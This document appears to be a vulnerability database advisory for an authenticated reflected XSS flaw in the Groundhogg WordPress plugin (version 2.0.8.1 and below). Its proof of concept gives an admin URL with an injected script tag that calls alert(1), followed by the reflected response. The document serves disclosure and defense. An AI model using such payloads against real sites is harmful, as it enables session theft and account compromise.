Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS



Description
Wordpress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.

Proof of Concept
# Exploit Title: Wordpress Groundhogg <= 2.0.8.1 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 2.0.8.1
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Groundhogg plugin with a version lower then 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Reflected Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts<%2Fscript><script>alert(1)<%2Fscript>
- The response will contain:


bulk_action: 'groundhogg/bulk_job/gh_export_contacts</script><script>alert(1)</script>/ajax', items: bp.getItems(), the_end: bp.isLastOfThem() },

Affects Plugin

References

URL https://nitesculucian.github.io/2019/10/23/groundhogg-1-3-2-authentificated-reflected-xss-vulnerability/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Lucian Ioan Nitescu
Submitter Lucian Ioan Nitescu
Submitter Website https://nitesculucian.github.io/
Submitter Twitter https://twitter.com/LucianNitescu
Views 11662
Verified No
WPVDB ID 9925

Timeline

Publicly Published 2019-10-23 (3 months ago)
Added 2019-10-24 (3 months ago)
Last Updated 2019-11-28 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin